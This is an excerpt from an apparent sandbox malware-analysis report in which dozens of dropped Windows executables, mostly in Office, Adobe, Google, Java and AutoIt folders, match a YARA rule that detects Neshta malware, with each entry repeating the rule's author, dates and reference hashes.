          Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Microsoft\Windows Defender\Scans\MpPayloadData\mpuser.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Windows\svchost.com, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
